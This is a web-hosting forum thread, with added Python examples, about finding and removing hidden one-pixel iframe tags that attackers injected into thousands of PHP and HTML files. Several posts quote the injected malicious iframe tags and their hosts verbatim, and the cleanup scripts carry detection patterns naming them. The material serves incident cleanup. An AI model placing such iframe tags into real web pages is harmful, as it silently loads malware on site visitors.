Need help removing tag from thousands of files

ccccanada

Well-Known Member
Jan 17, 2003
Hello!

Somehow on Aug 21 some hacker was able to compromise one of our servers and placed the following tag at the end of the page in tens of thousands of php and html documents, both inside and outside of the /home directory.

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

Since all the files that were affected were changed on the same day, I was able, with the following commands, to get lists of affected documents on the server.

find / -perm 766 -exec ls -al {} \; | grep "Aug 21" > files766.txt

find / -perm 666 -exec ls -al {} \; | grep "Aug 21" > files666.txt

find / -perm 777 -exec ls -al {} \; | grep "Aug 21" > files777.txt

The above command makes a text file with a list of all documents changed on that day and with certain permissions set, and places it in the directory from where you ran the command.

However now I am looking for help to find out if someone knows a command that will delete the line from all affected documents without me having to spend a month doing it manually.

If anyone can help it would be greatly appreciated.

Thanks
Harold
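
The triage step described in the post above (files changed on the compromise date, filtered by permission bits), as an added example that is not part of the original thread. It compares the modification time numerically instead of grepping `ls -al` output for "Aug 21", checks the file content for the exact tag quoted above, and reports world-writable mode rather than filtering on it, since the injected files need not be 666/766/777. The tag and the /home default come from the post; the function names and the command-line date argument are assumptions.

```python
import os
import stat
from datetime import date, datetime, timedelta

# The exact tag quoted in the first post, kept as bytes so the comparison is
# byte-for-byte and independent of the file's declared encoding.
INJECTED_TAG = (b'<iframe width="1" height="1" '
                b'src="http://step57.info/traff/index2.php" '
                b'style="border: 0;"></iframe>')

WEB_EXTS = (".php", ".html", ".htm")


def day_bounds(day):
    """Epoch-second [start, end) for one calendar day in local time."""
    start = datetime.combine(day, datetime.min.time())
    return start.timestamp(), (start + timedelta(days=1)).timestamp()


def find_tampered(root, day=None, tag=INJECTED_TAG, exts=WEB_EXTS):
    """Return sorted (path, world_writable) pairs for regular files under
    `root` whose name ends in one of `exts`, whose content contains `tag`
    and, if `day` is given, whose mtime falls on that day.

    The mtime filter only narrows the scan: an attacker can reset timestamps
    with touch, so run with day=None for the authoritative content-only pass.
    world_writable is reported, not used as a filter, because the injected
    files need not be mode 666/766/777 if the attacker wrote as the site's
    own user.
    """
    window = day_bounds(day) if day is not None else None
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets, devices
            if window and not (window[0] <= st.st_mtime < window[1]):
                continue
            try:
                with open(path, "rb") as fh:
                    tainted = tag in fh.read()
            except OSError:
                continue  # unreadable; move on
            if tainted:
                hits.append((path, bool(st.st_mode & stat.S_IWOTH)))
    return sorted(hits)


if __name__ == "__main__":
    import sys
    # Usage: python3 triage.py [root] [YYYY-MM-DD]. The year of "Aug 21" is
    # not stated in the post, so the date is supplied on the command line.
    root = sys.argv[1] if len(sys.argv) > 1 else "/home"
    day = date.fromisoformat(sys.argv[2]) if len(sys.argv) > 2 else None
    for path, ww in find_tampered(root, day):
        print(("WORLD-WRITABLE " if ww else "") + path)
```

Run it once with the date to get the quick list, then once without a date over the same tree; any file that only shows up in the second run had its timestamp changed after the injection and deserves a closer look.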
 

Murtaza_t

Well-Known Member
Jan 24, 2005
Earth
cPanel Access Level
Website Owner
This will help you:

Code:
#!/bin/bash
# Exact injected tag; it must sit on one line in the files for replace to match it.
TAG='<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'

# Globs are quoted so the shell does not expand them against the current
# directory before find sees them; -type f skips directories and symlinks.
find / -type f -name '*.php'  -exec replace "$TAG" '' -- {} \; > /dev/null

echo "Removed Tag from PHP file"

find / -type f -name '*.html' -exec replace "$TAG" '' -- {} \; > /dev/null

echo "Removed Tag from HTML file"

find / -type f -name '*.htm'  -exec replace "$TAG" '' -- {} \; > /dev/null

echo "Removed Tag from ALL files"

echo "Murtaza was here"

exit
It will remove tags from all .php .html .htm

NOTE: Please use it at your own risk.
 

ccccanada

Well-Known Member
Jan 17, 2003
Thank you very much i will give it a try now.
 

wkdwich

Well-Known Member
Apr 11, 2005
Have you found an effective means of keeping these attacks from recurring??


 

nick1

Member
May 21, 2006
I've the same issue and I see iframe code like the following in a lot of my php and html files.

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'

Can anyone please help me to tell how to remove them?

Thank you
 

nick1

Member
May 21, 2006
Thank you, but right now I need to know how I could remove this code;

it is in an encrypted format like

#&449;#456&;

When I post that code here, I see it become the following:

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'


:s
 

wkdwich

Well-Known Member
Apr 11, 2005

depending on where the codes are:
regular html files
regular php files
inside a database

you can just upload your local versions to the site again and that should make things ok.. unless they are embedded in the database, then you may have to go to phpMyAdmin and manually search and hand edit.. but as soon as you do that, stop your life and clean house.. local and remote
 

nick1

Member
May 21, 2006
The iframe code is in php and html files, not in the database, so I think if I knew the script I could remove it.

The issue is I don't have the backup for those files currently :(
 

wkdwich

Well-Known Member
Apr 11, 2005

Then you will have to save them locally, clean and re-upload; it might be faster than using the file manager tool in the cPanel admin

how many files are you talking about?? do you have root SSH access?
 

wkdwich

Well-Known Member
Apr 11, 2005
thanks, I'm afraid to modify search iframe string :( what should I mention there :s
What I suggest is you use that tool (or the method I show below) to search the public_html directories of all the domains.. so if your server is set up like mine anything in
/home/

make a list of the files, then one by one.. sorry but if you have no local copies it has to be this way..

pico -w [filename]

you may or may not have pico.. you can use whatever editor you are familiar with.. but just delete anything from the <iframe> to and including the </iframe> tag, save and close

You can try the method Murtaza_t suggested, but I have not tested that and I would not trust it personally..


the method I used:
I created a file on the server ftphack.txt that contained:
grep -l 'iframe' /home/*/public_html/*.htm
grep -l 'iframe' /home/*/public_html/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*.php
grep -l 'iframe' /home/*/public_html/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*.html
grep -l 'iframe' /home/*/public_html/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.html


and I ran it from the command line with output.. now I could see every file that contained iframe in it and knew what I had to repair

your mileage may vary and you may have to change the paths depending on your OS, but this worked very well for me.. and you need to hurry here.. the longer these files stay infected the more site visitors are getting infected and the more this circle will continue to grow.. we have to stop this madness!!

Last, I suggest highly you get your PC looked at by a very qualified professional to make sure it is clean from any keyloggers or other critters.. install KeyScrambler on your local PC, change ALL the passwords on the server AFTER you have done all that locally.. if you have a keylogger on your PC you can change the passwords till you are purple.. they will keep tabs and stay updated.. If the keylogger on your system was the issue you should be good now.. if not you MUST contact your host people and ask them to thoroughly investigate if there are other domains on the server that were hit also to determine if it was a single issue or a server compromise.


oh and after all that is done, get everything copied locally.., you could have been done with this by now :)

Oh and if you do run any databases use phpMyAdmin and search there for iframes to make sure it's not in there too..
 

brianoz

Well-Known Member
Mar 13, 2004
Melbourne, Australia
cPanel Access Level
Root Administrator
A little more sophistication ...
Code:
find /home -type f \( -name '*.php' -o -name '*.htm*' \) -print0 | xargs -0 grep -l iframe /dev/null
Works on infinite depth, and when /home is too big to expand '*'.

You can do a global replace if you use the exact string, with the replace command (think it's actually part of MySQL):

replace old new -- filelist

You'd have to get the iframe code exact and this would only work if it is all on one line.
 

nick1

Member
May 21, 2006
very nice, thank you
 

mesranet

Well-Known Member
May 6, 2002
Hi,

Today one of my clients was affected with an iframe in all .html files; the code is as below:

<iframe src="http://peskostruikaz.com/?click=5364991" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://peskostruikaz.com/?click=537207C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Is there any solution using 'find' to remove all those things? The problem is that 'click=537207C' is a running number.

Please help
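
An added example, not code from anyone in this thread, that addresses both brianoz's caveat (replace needs the exact string on one line) and the running click= number in the post above: a Python cleaner that removes any <iframe> whose src points at one of the hosts quoted in the thread, regardless of attribute order, quoting or line breaks, with a dry run by default and an atomic rewrite that keeps the file's mode. The host list, the sample HTML and the function names are assumptions. Entity-encoded or JavaScript-built injections (the &#...; form nick1 mentions) are not matched by this pattern and need a separate search.

```python
import os
import re
import tempfile

# Hosts quoted in this thread (assumption); extend with whatever your own
# injection points at.
INJECTED_HOSTS = ("step57.info", "ccfelomvhk.com", "peskostruikaz.com")
WEB_EXTS = (".php", ".html", ".htm")


def iframe_pattern(hosts=INJECTED_HOSTS):
    """Compile a pattern for an <iframe> whose src points at one of `hosts`.

    Attribute order, quoting style (", ' or none), line breaks inside the tag
    and the query string (the running click= value) are all left free, so one
    pattern covers every variant quoted in the thread. Entity-encoded or
    JavaScript-built tags are not matched and must be searched for separately.
    """
    host_alt = b"|".join(re.escape(h.encode()) for h in hosts)
    return re.compile(
        rb"<iframe\b[^>]*?\bsrc\s*=\s*[\"']?(?:https?:)?//(?:" + host_alt + rb")"
        rb"[^\s\"'>]*[\"']?[^>]*>\s*</iframe\s*>[ \t]*\r?\n?",
        re.IGNORECASE,
    )


def strip_iframes(data, pattern):
    """Return (cleaned_bytes, number_of_tags_removed)."""
    return pattern.subn(b"", data)


def clean_file(path, pattern, dry_run=True):
    """Remove matching iframes from one file; return how many were found.

    With dry_run=False the rewrite is atomic (temp file in the same directory,
    then rename) and keeps the original mode and, when run as root, the owner,
    so a half-written index.php is never served and a 644 file does not come
    back as 600.
    """
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, n = strip_iframes(data, pattern)
    if n == 0 or dry_run:
        return n
    st = os.stat(path)
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
    try:
        with os.fdopen(fd, "wb") as out:
            out.write(cleaned)
        os.chmod(tmp, st.st_mode & 0o7777)
        try:
            os.chown(tmp, st.st_uid, st.st_gid)
        except PermissionError:
            pass  # not root: file ends up owned by the user running the script
        os.replace(tmp, path)
    except BaseException:
        os.unlink(tmp)
        raise
    return n


def clean_tree(root, pattern, exts=WEB_EXTS, dry_run=True):
    """Walk `root`; return {path: tags_found} for every file that matched."""
    results = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            n = clean_file(path, pattern, dry_run)
            if n:
                results[path] = n
    return results


# Constructed sample (not a captured file): one legitimate iframe that must
# survive, plus the injected variants quoted in the thread, the last with a
# different click= value and split across two lines.
SAMPLE = (
    b"<html><body>\n"
    b'<iframe src="https://example.com/embed"></iframe>\n'
    b"<p>hello</p>\n"
    b'<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>\n'
    b"<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>\n"
    b'<iframe src="http://peskostruikaz.com/?click=5364991" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>\n'
    b'<iframe src="http://peskostruikaz.com/?click=537207C"\n'
    b'  width=1 height=1 style="visibility:hidden;position:absolute"></iframe>\n'
    b"</body></html>\n"
)

if __name__ == "__main__":
    import sys
    # Usage: python3 deiframe.py [root] [--apply]; without --apply nothing is written.
    root = sys.argv[1] if len(sys.argv) > 1 and not sys.argv[1].startswith("--") else "/home"
    live = "--apply" in sys.argv
    for path, n in sorted(clean_tree(root, iframe_pattern(), dry_run=not live).items()):
        print(f"{n:3d} {'removed from' if live else 'found in'} {path}")
```

Run the dry run first and read the list: if a file you did not expect shows up, the host list is too broad or a legitimate embed is pointing at one of those hosts. Only then run with --apply, and keep the dry-run output as the record of what was changed.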